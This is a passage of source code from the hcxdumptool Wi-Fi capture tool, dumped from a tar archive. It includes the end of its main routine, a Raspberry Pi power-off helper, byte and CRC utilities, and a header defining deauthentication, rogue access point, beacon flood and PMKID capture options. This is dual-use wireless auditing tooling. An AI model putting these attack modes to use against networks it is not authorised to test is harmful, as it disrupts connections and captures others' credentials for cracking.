and ioctl() system calls failed\n", errorcount); globalclose(); return EXIT_SUCCESS; } if(injectionflag == true) { getscanlist(); process_fd_injection(); globalclose(); return EXIT_SUCCESS; } if(sl == 1) getscanlistchannel(channelscanlist1); else if(sl == 2) getscanlistchannel(channelscanlist2); else if(sl == 3) getscanlistchannel(channelscanlist3); else if(sl == 4) getscanlistchannel(channelscanlist4); else if(userscanliststring != NULL) getscanlistchannel(userscanliststring); else getscanlist(); if(ptrfscanlist == fscanlist) { fprintf(stderr, "no frequencies available\n"); errorcount++; globalclose(); } if(pcapngoutname != NULL) { if(strcmp(pcapngoutname, "-") == 0) { fd_pcapng = hcxcreatepcapngdumpfd(fd_pcapng, mac_orig, interfacename, mac_myap, myrc, myanonce, mac_myclient, mysnonce, weakcandidatelen, weakcandidate); } else if(strcmp(pcapngoutname, "+") != 0) { fd_pcapng = hcxcreatepcapngdump(pcapngoutname, mac_orig, interfacename, mac_myap, myrc, myanonce, mac_myclient, mysnonce, weakcandidatelen, weakcandidate); } if(fd_pcapng <= 0) { fprintf(stderr, "could not create dumpfile %s\n", pcapngoutname); errorcount++; globalclose(); } } if(nmeaoutname != NULL) { if((gpsname == NULL) && (gpsdflag == false)) { fprintf(stderr, "no GPS device selected\n"); errorcount++; globalclose(); } if((fh_nmea = fopen(nmeaoutname, "a")) == NULL) { perror("failed to open NMEA 0183 dump file"); errorcount++; globalclose(); } setbuf(fh_nmea, NULL); } if((gpsname != NULL) || (gpsdflag == true)) opengps(); if(rcascanflag == false) process_fd(); else process_fd_rca(); globalclose(); return EXIT_SUCCESS; } /*===========================================================================*/ hcxdumptool-6.2.5/hcxpioff.c000066400000000000000000000225561415170014400160530ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "include/rpigpio.h" #define HCX_GPIO_BUTTON 1 #define HCX_GPIO_STATUSLED 2 #define HCX_TOT 3 #define HCX_REBOOT 4 #define HCX_POWER_OFF 5 #define HCX_HELP 'h' #define HCX_VERSION 'v' /*===========================================================================*/ /* global var */ static int gpiostatusled; static int gpiobutton; static struct timespec sleepled; struct timeval tv; struct timeval tvtot; static bool poweroffflag; static bool rebootflag; /*===========================================================================*/ __attribute__ ((noreturn)) static void globalclose() { if(gpiostatusled > 0) GPIO_SET = 1 << gpiostatusled; if(poweroffflag == true) { if(system("poweroff") != 0) { fprintf(stderr, "can't power off\n"); exit(EXIT_FAILURE); } } if(rebootflag == true) { if(system("reboot") != 0) { fprintf(stderr, "can't reboot\n"); exit(EXIT_FAILURE); } } exit(EXIT_SUCCESS); } /*===========================================================================*/ static inline size_t chop(char *buffer, size_t len) { static char *ptr; ptr = buffer +len -1; while(len) { if (*ptr != '\n') break; *ptr-- = 0; len--; } while(len) { if (*ptr != '\r') break; *ptr-- = 0; len--; } return len; } /*---------------------------------------------------------------------------*/ static inline int fgetline(FILE *inputstream, size_t size, char *buffer) { static size_t len; static char *buffptr; if(feof(inputstream)) return -1; buffptr = fgets (buffer, size, inputstream); if(buffptr == NULL) return -1; len = strlen(buffptr); len = chop(buffptr, len); return len; } /*===========================================================================*/ static bool initgpio(int gpioperi) { static int fd_mem; fd_mem = open("/dev/mem", O_RDWR|O_SYNC); if(fd_mem < 0) { fprintf(stderr, "failed to get device memory\n"); return false; } gpio_map = mmap(NULL, BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_mem, GPIO_BASE +gpioperi); close(fd_mem); if(gpio_map == MAP_FAILED) { fprintf(stderr, "failed to map GPIO memory\n"); return false; } gpio = (volatile unsigned *)gpio_map; return true; } /*===========================================================================*/ static int getrpirev() { static FILE *fh_rpi; static int len; static int rpi = 0; static int rev = 0; static int gpioperibase = 0; static char *revptr = NULL; static const char *revstr = "Revision"; static const char *hwstr = "Hardware"; static const char *snstr = "Serial"; static char linein[128]; fh_rpi = fopen("/proc/cpuinfo", "r"); if(fh_rpi == NULL) { perror("failed to retrieve cpuinfo"); return gpioperibase; } while(1) { if((len = fgetline(fh_rpi, 128, linein)) == -1) break; if(len < 15) continue; if(memcmp(&linein, hwstr, 8) == 0) { rpi |= 1; continue; } if(memcmp(&linein, revstr, 8) == 0) { rpirevision = strtol(&linein[len -6], &revptr, 16); if((revptr - linein) == len) { rev = (rpirevision >> 4) &0xff; if(rev <= 3) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0x09) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0x0c) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if((rev == 0x04) || (rev == 0x08) || (rev == 0x0d) || (rev == 0x00e) || (rev == 0x011)) { gpioperibase = GPIO_PERI_BASE_NEW; rpi |= 2; continue; } continue; } rpirevision = strtol(&linein[len -4], &revptr, 16); if((revptr - linein) == len) { if((rpirevision < 0x02) || (rpirevision > 0x15)) continue; if((rpirevision == 0x11) || (rpirevision == 0x14)) continue; gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; } continue; } if(memcmp(&linein, snstr, 6) == 0) { rpi |= 4; continue; } } fclose(fh_rpi); if(rpi < 0x7) return 0; return gpioperibase; } /*===========================================================================*/ static bool globalinit() { static int gpiobasemem = 0; sleepled.tv_sec = 0; sleepled.tv_nsec = GPIO_LED_DELAY; if((gpiobutton > 0) || (gpiostatusled > 0)) { if(gpiobutton == gpiostatusled) { fprintf(stderr, "same value for wpi_button and wpi_statusled is not allowed\n"); return false; } gpiobasemem = getrpirev(); if(gpiobasemem == 0) { fprintf(stderr, "failed to locate GPIO\n"); return false; } if(initgpio(gpiobasemem) == false) { fprintf(stderr, "failed to init GPIO\n"); return false; } if(gpiostatusled > 0) { INP_GPIO(gpiostatusled); OUT_GPIO(gpiostatusled); } if(gpiobutton > 0) INP_GPIO(gpiobutton); } return true; } /*===========================================================================*/ static void ledflash() { if(gpiostatusled == 0) return; GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; nanosleep(&sleepled, NULL); return; } /*===========================================================================*/ __attribute__ ((noreturn)) static void waitloop() { static int count = 1; while(1) { if(GET_GPIO(gpiobutton) > 0) globalclose(); gettimeofday(&tv, NULL); if(tv.tv_sec >= tvtot.tv_sec) globalclose(); if((count %5) == 0) ledflash(); count++; sleep(1); } } /*===========================================================================*/ __attribute__ ((noreturn)) static inline void version(char *eigenname) { fprintf(stdout, "%s %s (wpi version) (C) %s ZeroBeat\n", eigenname, VERSION_TAG, VERSION_YEAR); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usage(char *eigenname) { fprintf(stdout, "%s %s (wpi version) (C) %s ZeroBeat\n" "usage : %s \n" " press the button to power off\n" " hardware modification is necessary, read more:\n" " https://github.com/ZerBea/hcxdumptool/tree/master/docs\n" "\n" "options:\n" "-h : show this help\n" "-v : show version\n" "\n" "--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n" " default = GPIO not in use\n" "--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n" " default = GPIO not in use\n" "--tot= : enable timeout timer in minutes (minimum = 2 minutes)\n" " : hcxpioff will terminate if tot reached\n" "--reboot : once hcxpioff terminated, reboot system\n" " : default: power off system\n" "--help : show this help\n" "--version : show version\n" "\n" "run gpio readall to print a table of all accessible pins and their numbers\n" "(wiringPi, BCM_GPIO and physical pin numbers)\n" "\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usageerror(char *eigenname) { fprintf(stdout, "%s %s (wpi version) (C) %s by ZeroBeat\n" "usage: %s -h for help\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname); exit(EXIT_FAILURE); } /*===========================================================================*/ int main(int argc, char *argv[]) { static int auswahl; static int index; static long int totvalue; static const char *short_options = "hv"; static const struct option long_options[] = { {"gpio_button", required_argument, NULL, HCX_GPIO_BUTTON}, {"gpio_statusled", required_argument, NULL, HCX_GPIO_STATUSLED}, {"tot", required_argument, NULL, HCX_TOT}, {"reboot", no_argument, NULL, HCX_REBOOT}, {"version", no_argument, NULL, HCX_VERSION}, {"help", no_argument, NULL, HCX_HELP}, {NULL, 0, NULL, 0} }; auswahl = -1; index = 0; optind = 1; optopt = 0; gpiostatusled = 0; gpiobutton = 0; rebootflag = false; poweroffflag = true; tvtot.tv_sec = 2147483647L; tvtot.tv_usec = 0; while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1) { switch (auswahl) { case HCX_GPIO_BUTTON: gpiobutton = strtoll(optarg, NULL, 10); if((gpiobutton < 2) || (gpiobutton > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_GPIO_STATUSLED: gpiostatusled = strtoll(optarg, NULL, 10); if((gpiostatusled < 2) || (gpiostatusled > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_TOT: totvalue = strtol(optarg, NULL, 10); if(totvalue < 2) { fprintf(stderr, "tot must be >= 2 (minutes)\n"); exit(EXIT_FAILURE); } gettimeofday(&tvtot, NULL); tvtot.tv_sec += totvalue *60; break; case HCX_REBOOT: rebootflag = true; poweroffflag = false; break; case HCX_HELP: usage(basename(argv[0])); break; case HCX_VERSION: version(basename(argv[0])); break; case '?': usageerror(basename(argv[0])); break; } } if(globalinit() == false) { exit(EXIT_FAILURE); } waitloop(); return EXIT_SUCCESS; } /*===========================================================================*/ hcxdumptool-6.2.5/include/000077500000000000000000000000001415170014400155125ustar00rootroot00000000000000hcxdumptool-6.2.5/include/android-ifaddrs/000077500000000000000000000000001415170014400205445ustar00rootroot00000000000000hcxdumptool-6.2.5/include/byteops.c000066400000000000000000000037111415170014400173450ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include /*===========================================================================*/ uint32_t rotl32(uint32_t a, uint32_t n) { return((a << n) | (a >> (32 - n))); } /*===========================================================================*/ uint64_t rotl64(uint64_t a, uint64_t n) { return ((a << n) | (a >> (64 - n))); } /*===========================================================================*/ uint32_t rotr32(uint32_t a, uint32_t n) { return ((a >> n) | (a << (32 - n))); } /*===========================================================================*/ uint64_t rotr64(uint64_t a, uint64_t n) { return ((a >> n) | (a << (64 - n))); } /*===========================================================================*/ uint16_t byte_swap_8(uint8_t n) { return (n & 0xf0) >> 4 | (n & 0x0f) << 4; } /*===========================================================================*/ uint16_t byte_swap_16(uint16_t n) { return (n & 0xff00) >> 8 | (n & 0x00ff) << 8; } /*===========================================================================*/ uint32_t byte_swap_32(uint32_t n) { #if defined (__clang__) || defined (__GNUC__) return __builtin_bswap32 (n); #else return(n & 0xff000000) >> 24 | (n & 0x00ff0000) >> 8 | (n & 0x0000ff00) << 8 | (n & 0x000000ff) << 24; #endif } /*===========================================================================*/ uint64_t byte_swap_64(uint64_t n) { #if defined (__clang__) || defined (__GNUC__) return __builtin_bswap64 (n); #else return (n & 0xff00000000000000ULL) >> 56 | (n & 0x00ff000000000000ULL) >> 40 | (n & 0x0000ff0000000000ULL) >> 24 | (n & 0x000000ff00000000ULL) >> 8 | (n & 0x00000000ff000000ULL) << 8 | (n & 0x0000000000ff0000ULL) << 24 | (n & 0x000000000000ff00ULL) << 40 | (n & 0x00000000000000ffULL) << 56; #endif } /*===========================================================================*/ hcxdumptool-6.2.5/include/hashops.c000066400000000000000000000006161415170014400173260ustar00rootroot00000000000000#include "hashops.h" /*===========================================================================*/ uint32_t fcscrc32check(const uint8_t *buffer, uint32_t bufferlen) { uint32_t crc = 0xFFFFFFFF; uint32_t p; for(p = 0; p < bufferlen; ++p) { crc = crc32table[(crc ^buffer[p]) & 0xff] ^(crc >> 8); } return ~crc; } /*===========================================================================*/ hcxdumptool-6.2.5/include/hashops.h000066400000000000000000000063511415170014400173350ustar00rootroot00000000000000/*===========================================================================*/ /* CRC polynomial 0xedb88320 */ static const uint32_t crc32table[] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d }; /*===========================================================================*/ hcxdumptool-6.2.5/include/hcxdumptool.h000066400000000000000000000303341415170014400202340ustar00rootroot00000000000000#define HCX_DO_RCASCAN 1 #define HCX_RCASCAN_MAX 2 #define HCX_RCASCAN_ORDER 3 #define HCX_DO_TARGETSCAN 4 #define HCX_DEAUTH_REASON_CODE 5 #define HCX_DISABLE_DEAUTHENTICATION 6 #define HCX_DISABLE_AP_ATTACKS 7 #define HCX_STOP_AP_ATTACKS 8 #define HCX_RESUME_AP_ATTACKS 9 #define HCX_DISABLE_CLIENT_ATTACKS 10 #define HCX_STOP_CLIENT_M2_ATTACKS 11 #define HCX_SILENT 12 #define HCX_GPS_DEVICE 13 #define HCX_GPSD 14 #define HCX_NMEA_NAME 15 #define HCX_EAPOL_TIMEOUT 16 #define HCX_ACTIVE_BEACON 17 #define HCX_FLOOD_BEACON 18 #define HCX_EXTAP_BEACON 19 #define HCX_EXTAP_WPAENTBEACON 20 #define HCX_INFINITY 21 #define HCX_FILTERLIST_AP 22 #define HCX_FILTERLIST_CLIENT 23 #define HCX_FILTERLIST_AP_VENDOR 24 #define HCX_FILTERLIST_CLIENT_VENDOR 25 #define HCX_FILTERMODE 26 #define HCX_BPFC 27 #define HCX_WEAKCANDIDATE 28 #define HCX_TOT 29 #define HCX_REBOOT 30 #define HCX_POWER_OFF 31 #define HCX_GPIO_BUTTON 32 #define HCX_GPIO_STATUSLED 33 #define HCX_GPIO_STATUSLED_FLASHINTERVAL 34 #define HCX_IP 35 #define HCX_SERVER_PORT 36 #define HCX_CLIENT_PORT 37 #define HCX_CHECK_DRIVER 38 #define HCX_CHECK_INJECTION 39 #define HCX_FORCE_INTERFACE 40 #define HCX_ERROR_MAX 41 #define HCX_STATUS 42 #define HCX_BEACONPARAMS 43 #define HCX_WPAENT 44 #define HCX_EAPREQ 45 #define HCX_EAPREQ_FOLLOWNAK 46 #define HCX_EAPTUN 47 #define HCX_EAP_SERVER_CERT 48 #define HCX_EAP_SERVER_KEY 49 #define HCX_EAPOL_EAP_TIMEOUT 50 #define HCX_INTERFACE_NAME 'i' #define HCX_PCAPNG_NAME 'o' #define HCX_PACPNG_FRAMES 'f' #define HCX_CHANNEL 'c' #define HCX_SCANLIST 's' #define HCX_STAYTIME 't' #define HCX_SHOW_INTERFACES 'I' #define HCX_SHOW_CHANNELS 'C' #define HCX_SET_MONITORMODE 'm' #define HCX_HELP 'h' #define HCX_EXAMPLE 'x' #define HCX_VERSION 'v' #define ERROR_MAX 100 #define WATCHDOG 600 #define APLIST_MAX 512 #define RGLIST_MAX 1024 #define OWNLIST_MAX 1024 #define PMKLIST_MAX 1024 #define EAPLIST_MAX 1024 #define EAPREQLIST_MAX 20 #define FSCANLIST_MAX 1000 #define SCANLIST_MAX 256 #define FILTERLIST_MAX 256 #define FILTERLIST_LINE_LEN 256 #define BEACONEXTLIST_MAX 256 #define FDNSECTIMERB 10000000 /* 10msec */ #define FDNSECTIMER 200000000 #define FDNSECTXTIMER 500000000 #define RCA_SORT_BY_HIT 0 #define RCA_SORT_BY_COUNT 1 #define RCA_SORT_BY_CHANNEL 2 #define ATTACKSTOP_MAX 600 #define ATTACKRESUME_MAX 864000 #define OW_M1M2ROGUE_MAX 10 #define SERVERMSG_MAX 2048 #define MCPORT 60123 #define SERVERMSG_HEAD_SIZE 1 #define SERVERMSG_TYPE_CONTROL 0x00 #define SERVERMSG_TYPE_STATUS 0x01 #define SERVERMSG_TYPE_PCAPNGHEAD 0x02 #define SERVERMSG_TYPE_PCAPNG 0x03 #define SERVERMSG_CONTROL_SENDPCAPNGHEAD 0x01 #define DEBUGMSG_MAX 1024 #define STATUSMSG_MAX 1024 #define EAPOLTIMEOUT 20000 #define EAPOLEAPTIMEOUT 2500000 #define USER_EXIT_TOT 2 #define STAYTIME 4 #define LEDFLASHINTERVAL 5 #define NMEA_MAX 256 #define ESSID_LEN_MAX 32 #define RSN_LEN_MIN 20 #define WPA_LEN_MIN 22 #define BEACONBODY_LEN_MAX 2301 #define EAP_LEN_MAX 1418 #define IESETLEN_MAX 50 #define PAGIDLIST_MAX 256 #define BEACONINTERVALL 0x3e8 #define PCAPNG_FRAME_MANAGEMENT 0b00000001 #define PCAPNG_FRAME_EAP 0b00000010 #define PCAPNG_FRAME_DEFAULT 0b00000011 #define PCAPNG_FRAME_IPV4 0b00000100 #define PCAPNG_FRAME_IPV6 0b00001000 #define PCAPNG_FRAME_WEP 0b00010000 #define PCAPNG_FRAME_WPA 0b00100000 #define PCAPNG_FRAME_VENDOR 0b01000000 #define STATUS_EAPOL 0b0000000000000001 #define STATUS_ASSOCIATION 0b0000000000000010 #define STATUS_AUTHENTICATION 0b0000000000000100 #define STATUS_AP_BEACON_PROBE 0b0000000000001000 #define STATUS_ROGUE 0b0000000000010000 #define STATUS_GPS 0b0000000000100000 #define STATUS_INTERNAL 0b0000000001000000 #define STATUS_SERVER 0b0000000010000000 #define STATUS_CLIENT 0b0000000100000000 #define STATUS_EAP 0b0000001000000000 #define STATUS_EAP_NAK 0b0000010000000000 #define DISABLE_CLIENT_ATTACKS 0b00000001 #define DISABLE_DEAUTHENTICATION 0b00000010 #define DISABLE_AP_ATTACKS 0b00000110 #define SILENT 0b00000111 #define EAP_TLSFLAGS_VERSION 0b00000111 #define EAP_TLSFLAGS_START 0b00100000 #define EAP_TLSFLAGS_MORE_FRAGMENTS 0b01000000 #define EAP_TLSFLAGS_LENGTH_INCL 0b10000000 #define EAP_TLSFLAGS_SIZE 1 #define EAP_TLSLENGTH_SIZE 4 #define FM_PROTECT 1 #define FI_ATTACK 2 #define FI_VENDOR 3 #define FI_MAC 6 #define PACKET_RESEND_COUNT_MAX 7 #define PACKET_RESEND_TIMER_USEC 15500 #ifdef __BYTE_ORDER__ #if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ #define BIG_ENDIAN_HOST #endif #else #ifdef __OpenBSD__ # include # if BYTE_ORDER == BIG_ENDIAN # define BIG_ENDIAN_HOST # endif #endif #endif /*===========================================================================*/ typedef struct { uint8_t channel; uint8_t kdversion; #define KV_RSNIE 1 #define KV_WPAIE 2 uint8_t groupcipher; uint8_t cipher; #define TCS_WEP40 0b00000001 #define TCS_TKIP 0b00000010 #define TCS_WRAP 0b00000100 #define TCS_CCMP 0b00001000 #define TCS_WEP104 0b00010000 #define TCS_BIP 0b00100000 #define TCS_NOT_ALLOWED 0b01000000 uint16_t akm; #define TAK_PMKSA 0b0000000000000001 #define TAK_PSK 0b0000000000000010 #define TAK_FT 0b0000000000000100 #define TAK_FT_PSK 0b0000000000001000 #define TAK_PMKSA256 0b0000000000010000 #define TAK_PSKSHA256 0b0000000000100000 #define TAK_TDLS 0b0000000001000000 #define TAK_SAE_SHA256 0b0000000010000000 #define TAK_FT_SAE 0b0000000100000000 uint8_t pmkid[16]; uint8_t essidlen; uint8_t essid[ESSID_LEN_MAX]; }tags_t; #define TAGS_SIZE (sizeof(tags_t)) /*===========================================================================*/ typedef struct { uint8_t mac[6]; }maclist_t; #define MACLIST_SIZE (sizeof(maclist_t)) static int sort_maclist(const void *a, const void *b) { const maclist_t *ia = (const maclist_t *)a; const maclist_t *ib = (const maclist_t *)b; if(memcmp(ia->mac, ib->mac, 6) > 0) return 1; else if(memcmp(ia->mac, ib->mac, 6) < 0) return -1; return 0; } /*===========================================================================*/ #define EAPTLSCTX_BUF_SIZE (65535) typedef struct eaptlsctx_t { SSL *ssl; BIO *tls_in; BIO *tls_out; uint32_t tlslen; uint8_t buf[EAPTLSCTX_BUF_SIZE]; size_t buflen; size_t txpos; bool fragments_rx; bool fragments_tx; }eaptlsctx_t; #define EAPTLSCTX_SIZE (sizeof(eaptlsctx_t)) #define EAPTLS_TIMEOUT (50000000) /*===========================================================================*/ typedef struct eapctx_t { uint8_t reqstate; uint8_t id; uint8_t type; uint8_t version; uint8_t inner_id; uint8_t inner_type; uint8_t inner_version; bool tlstun; }eapctx_t; #define EAPCTX_SIZE (sizeof(eapctx_t)) /*===========================================================================*/ typedef struct { uint64_t timestamp; uint16_t status; #define OW_AUTH 0b0000000000000001 #define OW_ASSOC 0b0000000000000010 #define OW_REASSOC 0b0000000000000100 #define OW_EAP_REQ 0b0000000000001000 #define OW_EAP_RESP 0b0000000000010000 #define OW_M1M2ROGUE 0b0000000000100000 #define OW_M2M3 0b0000000001000000 #define FILTERED 0b1000000000000000 int owm1m2roguecount; uint8_t ap[6]; uint8_t client[6]; uint8_t essidlen; uint8_t essid[ESSID_LEN_MAX]; eapctx_t eapctx; }ownlist_t; #define OWNLIST_SIZE (sizeof(ownlist_t)) static int sort_ownlist_by_time(const void *a, const void *b) { const ownlist_t *ia = (const ownlist_t *)a; const ownlist_t *ib = (const ownlist_t *)b; if(ia->timestamp < ib->timestamp) return 1; else if(ia->timestamp > ib->timestamp) return -1; return 0; } /*===========================================================================*/ typedef struct { uint8_t ap[6]; uint64_t timestamp; uint32_t count; uint8_t reason; uint16_t status; #define AP_SEND 0b0000000000000001 #define AP_BEACON 0b0000000000000010 #define AP_PROBE_RESP 0b0000000000000100 #define AP_AUTH_RESP 0b0000000000001000 #define AP_ASSOC_RESP 0b0000000000010000 #define AP_REASSOC_RESP 0b0000000000100000 #define AP_EAP 0b0000000001000000 #define AP_M1 0b0000000010000000 #define AP_M3M4ZEROED 0b0000000100000000 #define AP_M1M2 0b0000001000000000 #define AP_M3M4 0b0000010000000000 #define AP_M2M3 0b0000100000000000 #define AP_PMKID 0b0001000000000000 uint8_t channel; uint16_t algorithm; uint8_t kdversion; uint8_t groupcipher; uint8_t cipher; uint16_t akm; uint8_t essidlen; uint8_t essid[ESSID_LEN_MAX]; uint8_t client[6]; }macessidlist_t; #define MACESSIDLIST_SIZE (sizeof(macessidlist_t)) static int sort_macessidlist_by_time(const void *a, const void *b) { const macessidlist_t *ia = (const macessidlist_t *)a; const macessidlist_t *ib = (const macessidlist_t *)b; if(ia->timestamp < ib->timestamp) return 1; else if(ia->timestamp > ib->timestamp) return -1; return 0; } /*===========================================================================*/ typedef struct { uint64_t timestamp; uint8_t pmk[32]; uint8_t essidlen; uint8_t essid[ESSID_LEN_MAX]; }pmklist_t; #define PMKLIST_SIZE (sizeof(pmklist_t)) static int sort_pmklist_by_time(const void *a, const void *b) { const pmklist_t *ia = (const pmklist_t *)a; const pmklist_t *ib = (const pmklist_t *)b; if(ia->timestamp < ib->timestamp) return 1; else if(ia->timestamp > ib->timestamp) return -1; return 0; } /*===========================================================================*/ typedef struct { uint64_t timestamp; char id[64]; }pagidlist_t; #define PAGIDLIST_SIZE (sizeof(pagidlist_t)) static int sort_pagidlist_by_time(const void *a, const void *b) { const pagidlist_t *ia = (const pagidlist_t *)a; const pagidlist_t *ib = (const pagidlist_t *)b; if(ia->timestamp < ib->timestamp) return 1; else if(ia->timestamp > ib->timestamp) return -1; return 0; } /*===========================================================================*/ typedef struct { uint64_t timestamp; uint8_t ap[6]; unsigned int count; unsigned int beacon; unsigned int proberesponse; unsigned int proberequest; unsigned int hit; char rssi; uint8_t channel; unsigned int frequency; uint8_t essidlen; uint8_t essid[ESSID_LEN_MAX]; }scanlist_t; #define SCANLIST_SIZE (sizeof(scanlist_t)) static int sort_scanlist_by_hit(const void *a, const void *b) { const scanlist_t *ia = (const scanlist_t *)a; const scanlist_t *ib = (const scanlist_t *)b; if(ia->hit < ib->hit) return 1; else if(ia->hit > ib->hit) return -1; if(ia->count < ib->count) return 1; else if(ia->count > ib->count) return -1; if(ia->channel > ib->channel) return 1; else if(ia->channel < ib->channel) return -1; if(memcmp(ia->ap, ib->ap, 6) < 0) return 1; else if(memcmp(ia->ap, ib->ap, 6) > 0) return -1; return 0; } static int sort_scanlist_by_beacon(const void *a, const void *b) { const scanlist_t *ia = (const scanlist_t *)a; const scanlist_t *ib = (const scanlist_t *)b; if(ia->beacon < ib->beacon) return 1; else if(ia->beacon > ib->beacon) return -1; if(ia->hit < ib->hit) return 1; else if(ia->hit > ib->hit) return -1; if(ia->channel > ib->channel) return 1; else if(ia->channel < ib->channel) return -1; if(memcmp(ia->ap, ib->ap, 6) < 0) return 1; else if(memcmp(ia->ap, ib->ap, 6) > 0) return -1; return 0; } static int sort_scanlist_by_channel(const void *a, const void *b) { const scanlist_t *ia = (const scanlist_t *)a; const scanlist_t *ib = (const scanlist_t *)b; if(ia->channel < ib->channel) return 1; else if(ia->channel > ib->channel) return -1; if(ia->hit < ib->hit) return 1; else if(ia->hit > ib->hit) return -1; if(ia->count < ib->count) return 1; else if(ia->count > ib->count) return -1; if(memcmp(ia->ap, ib->ap, 6) < 0) return 1; else if(memcmp(ia->ap, ib->ap, 6) > 0) return -1; return 0; } /*===========================================================================*/ typedef 